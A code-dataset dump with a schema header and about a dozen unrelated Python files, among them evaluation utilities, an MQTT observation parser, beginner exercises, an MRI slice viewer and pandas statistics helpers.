blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
08127b0f0ef5d039bc990b80c5d5b65c8a2e79f6 | e67acbdd7659cd1070d1c1a8be3192e2f673f855 | /utils.py | 1457eed5bcb3be03ec609bf395f268f7e6d87546 | []
| no_license | Kafu-Chino/PCNN | 9dc1c1499f448368bd6ae57829251ac5e4c66acd | 164ee7efaf03ba5fa18a6741a50cde2b9d545940 | refs/heads/master | 2021-04-10T10:18:29.949819 | 2020-03-27T07:38:05 | 2020-03-27T07:38:05 | 248,929,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,053 | py | #!/usr/bin/env python
# -- coding: utf-8 --
# @Time : 2020/3/22 22:54
# Author : Hu
# File : utils.py
import numpy as np
import time
def now():
return str(time.strftime('%Y-%m-%d %H:%M:%S'))
def save_pr(out_dir, name, epoch, pre, rec, fp_res=None, opt=None):
if opt is None:
out = open('{}/{}_{}_PR.txt'.format(out_dir, name, epoch + 1), 'w')
else:
out = open('{}/{}_{}_{}_PR.txt'.format(out_dir, name, opt, epoch + 1), 'w')
if fp_res is not None:
fp_out = open('{}/{}_{}_FP.txt'.format(out_dir, name, epoch + 1), 'w')
for idx, r, p in fp_res:
fp_out.write('{} {} {}\n'.format(idx, r, p))
fp_out.close()
for p, r in zip(pre, rec):
out.write('{} {}\n'.format(p, r))
out.close()
def eval_metric(true_y, pred_y, pred_p):
'''
calculate the precision and recall for p-r curve
reglect the NA relation
'''
assert len(true_y) == len(pred_y)
positive_num = len([i for i in true_y if i[0] > 0])
index = np.argsort(pred_p)[::-1]
tp = 0
fp = 0
fn = 0
all_pre = [0]
all_rec = [0]
fp_res = []
for idx in range(len(true_y)):
i = true_y[index[idx]]
j = pred_y[index[idx]]
if i[0] == 0: # NA relation
if j > 0:
fp_res.append((index[idx], j, pred_p[index[idx]]))
fp += 1
else:
if j == 0:
fn += 1
else:
for k in i:
if k == -1:
break
if k == j:
tp += 1
break
if fp + tp == 0:
precision = 1.0
else:
precision = tp * 1.0 / (tp + fp)
recall = tp * 1.0 / positive_num
if precision != all_pre[-1] or recall != all_rec[-1]:
all_pre.append(precision)
all_rec.append(recall)
print("tp={}; fp={}; fn={}; positive_num={}".format(tp, fp, fn, positive_num))
return all_pre[1:], all_rec[1:], fp_res | [
"[email protected]"
]
| |
9af8ed039c844e9b466786e5d8b703d49786ae92 | cb79ccd823e4a40fce3534d8fb8ba9094e08a5b8 | /Model/category.py | 4084a855416dcb83ab04fd199e533a50e631ae4d | [
"MIT"
]
| permissive | ouldevloper/booksmanagement | 55b811f03b499415da341fd44fb6de89223fd1d8 | ca518107c178c326c091a16d7a2348c0c29a44ca | refs/heads/main | 2023-03-27T19:51:33.286285 | 2021-04-03T00:34:11 | 2021-04-03T00:34:11 | 352,447,646 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | # @Author: Abdellah Oulahyane
# @Date: 2021-03-24 07:01:27
# @Last Modified by: Abdellah Oulahyane
# @Last Modified time: 2021-03-28 04:11:31
# @Contact fb.com/maruki00
from Model.sys.Model import Model
class Category(Model):
def __init__(self,
id=None,
label=None,
description=None
):
self.id = id
self.label = label
self.description = description | [
"[email protected]"
]
| |
8ff2f9ed975a03f1b78428458c00fce26ec0d025 | ccf4a743d32a1babda3cbca1d0f622340179527f | /PythonPushGui/GuiHome.py | 38f4383588c4648a91eabf7c6f0948ff7c8aed4b | []
| no_license | zbo/zbodo | 678226a630eb49f2587d3b3cac62745930600188 | 98c7f3f6e76bd769ff0a6ed3f7117a49bbf015cd | refs/heads/master | 2021-05-19T02:57:40.375642 | 2020-04-23T07:35:50 | 2020-04-23T07:35:50 | 17,794,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,420 | py | import wx
import urllib2
import ConnectStrings
import GetClientIdHandler
import StatusManager
import AddToStreamHandler
import XmlProcess
import PushServer
from twisted.protocols import basic
from twisted.internet import reactor, protocol, defer
import datetime
from xml.sax import make_parser,SAXException
f = PushServer.protocol.ServerFactory()
f.protocol =PushServer.WebPUSH
reactor.listenTCP(8081, f)
reactor.run()
#req_GetClientId = ConnectStrings.GetString_ServerHeader()+'?'+ConnectStrings.GetString_GetClientId()
#print req_GetClientId
#
#getClientIdHandler=GetClientIdHandler.GetClientIdHandler()
#parser=make_parser()
#parser.setContentHandler(getClientIdHandler)
#parser.parse(req_GetClientId)
#print StatusManager.StatusManager.clientId
#
#req_AddStream=ConnectStrings.GetString_ServerHeader()+'?'+ConnectStrings.GetString_AddToStream()
#print req_AddStream
#addToStreamHandler=AddToStreamHandler.AddToStreamHandler()
#parser2=make_parser()
#parser2.setContentHandler(addToStreamHandler)
#
#url=req_AddStream
#StatusManager.StatusManager.stream=urllib2.urlopen(url)
#tagList=[]
#str=''
#while 1:
# char=StatusManager.StatusManager.stream.read(1)
# if char=='<':
# nextChar=StatusManager.StatusManager.stream.read(1)
# while nextChar!='>':
# str+=nextChar
# nextChar=StatusManager.StatusManager.stream.read(1)
# XmlProcess.ProcessNode(str)
# str=''
| [
"[email protected]"
]
| |
fb45ef36d57123365e9570c7d00c7a49809b7ec6 | 6e4c6cc1ee81e7c6486b3a6509bd21c38aaa6072 | /monica/jobs/acquisition/messageacquisition.py | b1b7fc1ca71276f90a1556ba4784e6246b088254 | [
"Apache-2.0"
]
| permissive | MONICA-Project/HLDFAD_SourceCode | 42a8011a3a7ef6fc3b7bb1bfd4a83c3154316db5 | 94748f20d104bb00e3a71f485dfd8199b7d7dc69 | refs/heads/master | 2022-01-20T10:32:47.712389 | 2020-03-04T15:58:36 | 2020-03-04T15:58:36 | 243,544,736 | 1 | 0 | Apache-2.0 | 2022-01-06T22:43:05 | 2020-02-27T15:04:17 | Python | UTF-8 | Python | false | false | 5,064 | py | from jobs.models import CrowdDensityLocalObservation, Localization
import logging
from dateutil.parser import isoparse
from utility.utility_catalog_cached import UtilityCatalogCached
from typing import Dict, Any
import json
logger = logging.getLogger('textlogger')
class MessageAcquisition:
LABEL_DATASTREAM = "Datastream"
LABEL_IOTID = "@iot.id"
LABEL_RESULT = "result"
LABEL_PHENOMENONTIME = "phenomenonTime"
@staticmethod
def mics_observation(j_data, pilot_name):
return
@staticmethod
def crowd_density_local_observation(mqtt_dictionary: Dict[str, Any],
pilot_name: str,
observable_id: int) -> CrowdDensityLocalObservation:
try:
if MessageAcquisition.LABEL_DATASTREAM not in mqtt_dictionary.keys() \
or MessageAcquisition.LABEL_IOTID not in mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM]:
return None
if MessageAcquisition.LABEL_RESULT not in mqtt_dictionary or not mqtt_dictionary[MessageAcquisition.LABEL_RESULT]:
return None
# FIXME: The field extracted is the Observable identifier NOT the datastream id
# (NOTE: it is not actually used)
datastream_id = mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM][MessageAcquisition.LABEL_IOTID]
iot_id = mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM][MessageAcquisition.LABEL_IOTID]
json_result = mqtt_dictionary[MessageAcquisition.LABEL_RESULT]
# Create Observation
crowd_density_local = CrowdDensityLocalObservation()
crowd_density_local.set_pilot_name(pilot_name=pilot_name)
crowd_density_local.set_datastream_id(datastream_id=datastream_id)
crowd_density_local.set_observable_id(observable_id=observable_id)
crowd_density_local.set_obs_iot_id(iot_id=iot_id)
if not crowd_density_local.from_dictionary(dictionary=json_result):
del crowd_density_local
return None
device_registration = UtilityCatalogCached.\
get_device_registration(datastream_id=crowd_density_local.get_datastream_id())
if not device_registration:
logger.warning('crowd_density_local_observation Unable To Find DeviceRegistration. Abort')
del crowd_density_local
return None
if not crowd_density_local.set_info_registration(device_registration=device_registration):
del crowd_density_local
return None
logger.info('CROWD DENSITY LOCAL OBSERVATION SAVED INFO: {}'.format(crowd_density_local.to_trace_string()))
return crowd_density_local
except Exception as ex:
# logger.exception(ex)
logger.error('CROWD DENSITY LOCAL REGISTRATION EXCEPTION: {0}'.format(ex))
@staticmethod
def localization_observation(mqtt_dictionary: Dict[str, Any],
pilot_name: str,
observable_id: int = 0,
running_id: int = 0) -> Localization:
try:
if not mqtt_dictionary:
return None
if MessageAcquisition.LABEL_RESULT not in mqtt_dictionary:
logger.error('localization observation Error. Probably received GOST Message, JSON: {}'
.format(json.dumps(mqtt_dictionary)))
return None
json_result = mqtt_dictionary[MessageAcquisition.LABEL_RESULT]
timestamp = mqtt_dictionary[MessageAcquisition.LABEL_PHENOMENONTIME]
datastream_id = 0
json_datastream = mqtt_dictionary[MessageAcquisition.LABEL_DATASTREAM]
if MessageAcquisition.LABEL_IOTID in json_datastream:
datastream_id = json_datastream[MessageAcquisition.LABEL_IOTID]
iot_id = json_datastream[MessageAcquisition.LABEL_IOTID]
else:
logger.warning("UNABLE TO FIND OBS_ID in Datastream")
loc_observation = Localization()
loc_observation.from_dictionary(dictionary=json_result)
loc_observation.timestamp = isoparse(timestamp)
loc_observation.set_pilot_name(pilot_name=pilot_name)
loc_observation.set_datastream_id(datastream_id=datastream_id)
loc_observation.set_observable_id(observable_id=observable_id)
loc_observation.set_obs_iot_id(iot_id=iot_id)
loc_observation.run_id = running_id
loc_observation.save()
return loc_observation
except Exception as ex:
logger.error('MessAcquisit localization_observation Exception: {0}'.format(ex))
return None
@staticmethod
def flow_observation(j_data, pilot_name):
logger.debug(j_data)
@staticmethod
def weareables_observation(j_data):
logger.debug(j_data)
| [
"[email protected]"
]
| |
a8b3d3d08593ea6f9f48b305c4117d8e4a37ed90 | 5b92536804e0abd77e0385e78c5412173c0829b6 | /resume_parsing.py | d2e54450e609de224956a8b64a9fb035cea0cdff | []
| no_license | deepikavemuri/pythonPractise | f2a1e51460b3f647583fde36f0cf0818c1a75095 | f16c663bb8c09f557edf2418a6a6b990e2a77853 | refs/heads/main | 2023-03-04T20:10:39.909848 | 2021-02-03T07:39:56 | 2021-02-03T07:39:56 | 335,537,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | import nltk
import os
resume_folder = '/home/anantharam/Deepika/Resumes_text'
resumes = os.listdir(resume_folder)
for resume_path in resumes:
document = open(resume_folder + "/" + resume_path)
x = document.read()
x = x.replace("\n", " ")
print(x)
job_keyWords = ['Python', 'C', 'Finance']
#lines = x.split('\n')
#words = []
s = ""
# temp = open(keyword_content, 'a+')
words = nltk.word_tokenize(x)
print(words)
for word in words:
if word in job_keyWords:
f = open(word+'.txt', 'a+')
#print(s)
if word not in temp:
s += word
f.write(resume_path + ",")
f.close() | [
"[email protected]"
]
| |
2ed205c312b02dc19f7009c9b2b26de639d25969 | dede18db20fd47c3059bcbf74562e8773096821e | /advent/2019/3/advent1.py | 9e9514de476c5fa21130d1855c5b72d8f43406eb | []
| no_license | conradoboeira/CP | a70232d916c04d81c93f84de70afb2f252cff4ad | 675b098a1c62c7d9bcfa5d8d9a2d7e359b24eef2 | refs/heads/master | 2020-03-31T19:55:21.417786 | 2020-02-18T03:56:40 | 2020-02-18T03:56:40 | 152,518,258 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,794 | py | line1 = input().split(',')
line2 = input().split(',')
pts_marked = []
pt= (0,0)
for com in line1:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
if(direction == 'R'):
for i in range (pt[0], end_point[0]+1):
pts_marked.append((i, pt[1]))
elif(direction == 'L'):
for i in range (pt[0], end_point[0]-1, -1):
pts_marked.append((i, pt[1]))
elif(direction == 'U'):
for i in range (pt[1], end_point[1]+1):
pts_marked.append((pt[0], i))
else:
for i in range (pt[1], end_point[1]-1, -1):
pts_marked.append((pt[0], i))
pt = end_point
print(pts_marked)
closer_pt = -1
pt = (0,0)
for com in line2:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
if(direction == 'R'):
for i in range (pt[0], end_point[0]+1):
point = (i, pt[1])
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
elif(direction == 'L'):
for i in range (pt[0], end_point[0]-1, -1):
point = (i, pt[1])
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
elif(direction == 'U'):
for i in range (pt[1], end_point[1]+1):
point = (pt[0], 1)
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
else:
for i in range (pt[1], end_point[1]-1, -1):
point = (pt[0], 1)
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
print(end_point)
pt = end_point
print(closer_pt)
| [
"[email protected]"
]
| |
71c99974459ee5974e36e755091f0d37914ff64c | 87b55dd99e9828bed011fd7cf0a3cf059d70d391 | /pythonPractice/ex26.py | 9d6dc85354bd28fb93c4f707f95c16c35e6007d3 | []
| no_license | David-GaTre/Python-the-hard-way | f2945a84b07a3c35d0d8d8f2b9e53b514043d9c9 | 558c7986b655b9f951181b73ac2de62a1e19d7dd | refs/heads/master | 2022-01-18T09:43:28.303865 | 2019-08-04T07:21:53 | 2019-08-04T07:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,285 | py | def break_words(stuff):
"""This function will break up words for us."""
words = stuff.split(' ')
return words
def sort_words(words):
"""Sorts the words."""
return sorted(words)
def print_first_word(words):
"""Prints the first word after popping it off."""
word = words.pop(0)
print word
def print_last_word(words):
"""Prints the last word after popping it off."""
word = words.pop(-1)
print word
def sort_sentence(sentence):
"""Takes in a full sentence and returns the sorted words."""
words = break_words(sentence)
return sort_words(words)
def print_first_and_last(sentence):
"""Prints the first and last words of the sentence."""
words = break_words(sentence)
print_first_word(words)
print_last_word(words)
def print_first_and_last_sorted(sentence):
"""Sorts the words then prints the first and last one."""
words = sort_sentence(sentence)
print_first_word(words)
print_last_word(words)
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explantion
\n\t\twhere there is none.
"""
print "--------------"
print poem
print "--------------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
print "We'd have %d jeans, %d jars, and %d crates." % (beans, jars, crates)
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crabapples." % secret_formula(start_point)
sentence = "All good things come to those who weight."
words = break_words(sentence)
sorted_words = sort_words(words)
print_first_word(words)
print_last_word(words)
print_first_word(sorted_words)
print_last_word(sorted_words)
sorted_words = sort_sentence(sentence)
print sorted_words
print_first_and_last(sentence)
print_first_and_last_sorted(sentence) | [
"[email protected]"
]
| |
72fb24a240291a432d20c7b10d1f829948019281 | ccf324383bce0a74ef3a4eca9f277e9db89800bb | /Chp8/8-3_exercises.py | 0bba55f4dd698b068f18ad00a90cd7d1a4abef43 | []
| no_license | tanktoptony/RealPython-Book1 | 825ef822cee8593bb80a95a840bda0a8214ea311 | 0c3cd79edf9e61236b0164e52d212d0bbd208c5a | refs/heads/master | 2021-01-12T00:39:53.717091 | 2015-04-16T08:51:45 | 2015-04-16T08:51:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 522 | py | # 1. Write a script that prompts the user to enter a word using the raw_input() function,
# stores that input in a string object, and then displays whether the length of that string
# is less than 5 characters, greater than 5 characters, or equal to 5 characters by using a
# set of if, elif and else statements.
#1
user_input = raw_input("Enter a word: ")
if len(user_input) < 5:
print 'less that 5 characters'
elif len(user_input) > 5:
print 'greater that 5 characters'
else:
print 'equal to 5 characters' | [
"[email protected]"
]
| |
9bdfba61deccc4c6699bd54280a7728fb4b4069a | 9612c53a9e666ba10510962a833a55fb7553be7b | /getDataSafir/jsonToCsv.py | 6a2c199030293c790470a6ac6c375484ec09da6f | []
| no_license | raksmeyny/big-data | 04098ed6fc6c51e9643c2dba0ee30f4c38d143ce | 1222edd5ca59a3d04ad3ac4dd444bea4cfd727e6 | refs/heads/master | 2021-01-10T04:53:57.905212 | 2016-03-14T04:15:14 | 2016-03-14T04:15:14 | 52,132,443 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | import csv
import json
with open('comment.json') as x:
x = json.load(x)
print x
with open('data.csv','a') as f:
csvfile=csv.writer(f)
for item in x:
csvfile.writerow([item["date"],item["comment"],item["link"],item["likes"]]);
# f = csv.writer(open("comment.csv", "w+"))
# f.writerow(["date", "comment", "link", "likes"])
# for x in x:
# f.writerow([x["date"],
# x["comment"],
# x["link"],
# x["likes"]])
| [
"raksmey.ny"
]
| raksmey.ny |
f15ea5350f91db08607111b1b3da17afdb7e9df0 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /compositional_rl/gwob/examples/web_environment_example.py | db65accda519a7ce01ec591613e7c7d0385b57be | [
"Apache-2.0",
"CC-BY-4.0"
]
| permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 6,400 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Example execution of a rule-based optimal policy on gminiwob shopping."""
import time
from absl import app
from absl import flags
from absl import logging
from CoDE import test_websites
from CoDE import utils
from CoDE import vocabulary_node
from CoDE import web_environment
flags.DEFINE_string("data_dep_path", None,
"Data dep path for local miniwob files.")
flags.DEFINE_boolean(
"run_headless_mode", False,
"Run in headless mode. On borg, this should always be true.")
flags.DEFINE_boolean(
"use_conceptual", False,
"If true, use abstract web navigation where it is assumed to known which profile field corresponds to which element."
)
FLAGS = flags.FLAGS
def run_policy_on_shopping_website():
"""Run an optimal policy on the shopping website and visualize in browser."""
# Create a generic web environment to which we will add primitives and
# transitions to create a shopping website. These parameters will work to
# observe a simple policy running but they might be insufficient in a training
# setting as observations will be converted into arrays and these parameters
# are used to shape them. In this example, they don't have that effect.
env = web_environment.GMiniWoBWebEnvironment(
base_url="file://{}/".format(FLAGS.data_dep_path),
subdomain="gminiwob.generic_website",
profile_length=5,
number_of_fields=5,
use_only_profile_key=False,
number_of_dom_elements=150,
dom_attribute_sequence_length=5,
keyboard_action_size=5,
kwargs_dict={
"headless": FLAGS.run_headless_mode,
"threading": False
},
step_limit=25,
global_vocabulary=vocabulary_node.LockedVocabulary(),
use_conceptual=FLAGS.use_conceptual)
# Create a shopping website design with difficulty = 3.
website = test_websites.create_shopping_website(3)
design = test_websites.generate_website_design_from_created_website(
website)
# Design the actual environment.
env.design_environment(
design, auto_num_pages=True)
# Make sure raw_state=True as this will return raw observations not numpy
# arrays.
state = env.reset(raw_state=True)
# Optimal sequences of elements to visit. Some might be redundant and will be
# skipped.
optimal_actions = [
"group_next_p0",
"group_username",
"group_password",
"group_rememberme",
"group_captcha",
"group_stayloggedin",
"group_next_p1",
"group_next_p2",
"group_name_first",
"group_name_last",
"group_address_line1",
"group_address_line2",
"group_city",
"group_postal_code",
"group_state",
"group_submit_p2",
]
# Corresponding pages of these elements:
# [0, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3]
reward = 0.0
logging.info("Utterance: %s", str(state.utterance))
logging.info("\n\n")
logging.info("All available primitives: %s",
str(env.get_all_actionable_primitives()))
logging.info("\n\n")
# Iterate over all optimal actions. For each action, iterate over all elements
# in the current observation. If an element matches, execute the optimal
# action and continue.
# Iterate over optimal actions.
for action in optimal_actions:
logging.info("Element at focus: %s", str(action))
# Iterate over all elements in the current observation.
# order_dom_elements returns an ordered list of DOM elements to make the
# order and elements consistent.
for i, element in enumerate(
utils.order_dom_elements(state.dom_elements, html_id_prefix=None)):
# If HTML if of the element matches the action, execute the action.
if element.id == action.replace("group", "actionable"):
logging.info("Acting on (%s)", str(element))
logging.info("\tAttributes of the element: %s",
str(utils.dom_attributes(element, 5)))
# Get the corresponding profile fields.
profile_keys = env.raw_profile.keys
# Execute the (element index, profile field index) action on the
# website. Environment step function accepts a single scalar action.
# We flatten the action from a tuple to a scalar which is deflattened
# back to a tuple in the step function.
if action[len("group") +
1:] in profile_keys and not FLAGS.use_conceptual:
logging.info("Profile: %s, Element ID: %s",
str(profile_keys.index(action[len("group") + 1:])),
str(action[len("group") + 1:]))
# action=element_index + profile_field_index * number_of_elements
# This is converted back into a tuple using a simple modulo
# arithmetic.
state, r, _, _ = env.step(
i + profile_keys.index(action[len("group") + 1:]) *
env.number_of_dom_elements, True)
else: # This is the case where we have abstract navigation problem.
logging.info("Element ID: %s", str(action[len("group") + 1:]))
# We don't need to convert a tuple into a scalar because in this case
# the environment expects the index of the element.
state, r, _, _ = env.step(i, True)
logging.info("Current reward: %f", r)
reward += r
if not FLAGS.run_headless_mode:
# wait 1 sec so that the action can be observed on the browser.
time.sleep(1)
break
logging.info("Final reward: %f", reward)
if not FLAGS.run_headless_mode:
# wait 30 secs so that the users can inspect the html in the browser.
time.sleep(30)
def main(argv):
if len(argv) > 1:
raise app.UsageError("Too many command-line arguments.")
run_policy_on_shopping_website()
if __name__ == "__main__":
app.run(main)
| [
"[email protected]"
]
| |
d9c783ad8abf89d55348ad7b4a292cdac5bbf359 | 91a0bfacb61ae681860c560ba52ac09df4910b8f | /Codes/visualize.py | 6289ddbd090a1437bbe538404c0c01dd6a2e14a9 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
]
| permissive | AayushKadam/brain_age | 98609293827778b978215b9d681f521fdab6d948 | 8a768e29046d525fdef3d57a58c742b52ed6f8e7 | refs/heads/master | 2021-10-15T19:18:22.779808 | 2019-02-05T20:12:46 | 2019-02-05T20:12:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | import os
import matplotlib.pyplot as plt
import numpy as np
import random
#import scipy.ndimage
def show_slices(slices):
""" Function to display row of image slices """
fig, axes = plt.subplots(1, len(slices))
for i, slice in enumerate(slices):
axes[i].imshow(slice.T, cmap="gray", origin="lower")
def rot90(m, k=1, axis=2):
"""Rotate an array by 90 degrees in the counter-clockwise direction around the given axis"""
m = np.swapaxes(m, 2, axis)
m = np.rot90(m, k)
m = np.swapaxes(m, 2, axis)
return m
#first = np.load('data2\\1#(65, 65, 55).npy')
"""
X_before = 5
npad = ((5, 5), (0, 0), (0, 0))
first = np.pad(first, pad_width=npad, mode='constant', constant_values=0)
startz = 65//2-(55//2)
first = first[0:65,0:65, startz:startz+55]
"""
first = np.load('data2\\85#(65, 65, 55).npy')
#first = np.load('mean_img2.npy')
second = np.load('shuffled2\\45#(65, 65, 55).npy')
#first = rot90(first, 3, 0)
#first = rot90(first, 1, 2)
print(first.shape)
show_slices([
first[int(first.shape[0]/2), :, :],
first[:, int(first.shape[1]/2), :],
first[:, :, int(first.shape[2]/2)]])
plt.show()
show_slices([second[int(second.shape[0]/2), :, :],
second[:, int(second.shape[1]/2), :],
second[:, :, int(second.shape[2]/2)]])
plt.show()
| [
"[email protected]"
]
| |
e9155963542c0338f2e00c360ebb229b888acae0 | 439f1b3e2e7a454abd2cfac99d3074ba02405c09 | /code.py | 9c2f9842cf2aaa24cd16140cf0d7ad625a5414ae | [
"MIT"
]
| permissive | saikrishnan255/extracting-business-insights | 10c1286fafa41d59907b7b9afabf39fdd1300c56 | b79922148bd1aa80bea9d3571456f2891f06c713 | refs/heads/main | 2023-02-04T16:03:35.220099 | 2020-12-22T11:30:22 | 2020-12-22T11:30:22 | 323,607,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,061 | py | # --------------
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv(path)
def visual_summary(type_, df, col):
df[col].plot(kind = type_)
plt.show()
"""Summarize the Data using Visual Method.
This function accepts the type of visualization, the data frame and the column to be summarized.
It displays the chart based on the given parameters.
Keyword arguments:
type_ -- visualization method to be used
df -- the dataframe
col -- the column in the dataframe to be summarized
"""
def central_tendency(type_, df, col):
stats = {'mean': np.mean,'median': np.median, 'mode': st.mode}
return stats[type_](df[col])
"""Calculate the measure of central tendency.
This function accepts the type of central tendency to be calculated, the data frame and the required column.
It returns the calculated measure.
Keyword arguments:
type_ -- type of central tendency to be calculated
df -- the dataframe
col -- the column in the dataframe to do the calculations
Returns:
cent_tend -- the calculated measure of central tendency
"""
def ranger(df):
return max(df) - min(df)
def mad(df):
return(np.mean(np.absolute(df - np.mean(df))))
def cv(df):
return(((np.std(df)/np.mean(df)))*100)
def iqr(df):
return (np.percentile(df,75)- np.percentile(df,25))
def measure_of_dispersion(type_, df, col):
stats = {'Standard Deviation':np.std,'Variance':np.var,'Range':ranger,'Covariance':np.cov,'MAD':mad,'CV':cv,'IQR':iqr}
return stats[type_](df[col])
"""Calculate the measure of dispersion.
This function accepts the measure of dispersion to be calculated, the data frame and the required column(s).
It returns the calculated measure.
Keyword arguments:
type_ -- type of central tendency to be calculated
df -- the dataframe
col -- the column(s) in the dataframe to do the calculations, this is a list with 2 elements if we want to calculate covariance
Returns:
disp -- the calculated measure of dispersion
"""
def calculate_correlation(type_, df, col1, col2):
if type_ == 'Pearson':
return (df.cov().loc[col1,col2])/(np.std(df[col1])*np.std(df[col2]))
elif type_ == 'Spearman':
d = df[[col1,col2]].rank(axis = 0)
d['d^2'] = (d[col1] - d[col2])**2
d_square = d['d^2'].sum()
l = len(df[col1])
spearman = 1-((6*d_square)/(l*(l**2-1)))
return spearman
"""Calculate the defined correlation coefficient.
This function accepts the type of correlation coefficient to be calculated, the data frame and the two column.
It returns the calculated coefficient.
Keyword arguments:
type_ -- type of correlation coefficient to be calculated
df -- the dataframe
col1 -- first column
col2 -- second column
Returns:
corr -- the calculated correlation coefficient
"""
def calculate_probability_discrete(data, event):
crisis = df[event].value_counts()
return(crisis.iloc[1]/(crisis.iloc[0] + crisis.iloc[1]))
"""Calculates the probability of an event from a discrete distribution.
This function accepts the distribution of a variable and the event, and returns the probability of the event.
Keyword arguments:
data -- series that contains the distribution of the discrete variable
event -- the event for which the probability is to be calculated
Returns:
prob -- calculated probability fo the event
"""
def event_independence_check(prob_event1, prob_event2, prob_event1_event2):
pa_b = prob_event1_event2/prob_event2
if pa_b == prob_event1:
return 'Independent'
elif pa_b != prob_event1:
return 'Dependent'
"""Checks if two events are independent.
This function accepts the probability of 2 events and their joint probability.
And prints if the events are independent or not.
Keyword arguments:
prob_event1 -- probability of event1
prob_event2 -- probability of event2
prob_event1_event2 -- probability of event1 and event2
"""
# Checking if banking crisis is independent
b_s = df[(df['systemic_crisis'] == 1) & (df['banking_crisis'] == 'crisis')]
b_i = df[(df['inflation_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
b_c = df[(df['currency_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
p_bank_system = b_s['case'].count()/df['case'].count()
p_bank_currency = b_c['case'].count()/df['case'].count()
p_bank_inflation = b_i['case'].count()/df['case'].count()
p_bank = calculate_probability_discrete(df,'banking_crisis')
p_system = calculate_probability_discrete(df,'systemic_crisis')
p_inflation = calculate_probability_discrete(df,'inflation_crises')
p_currency = calculate_probability_discrete(df,'currency_crises')
# System
event_independence_check(p_bank, p_system, p_bank_system)
# Currency
event_independence_check(p_bank, p_currency, p_bank_currency)
# Inflation
event_independence_check(p_bank, p_inflation, p_bank_inflation)
# Bank given system
p_b_s = p_bank_system/p_system
p_b_c = p_bank_currency/p_currency
p_b_i = p_bank_inflation/p_inflation
prob_ = [p_b_s,p_b_c,p_b_i]
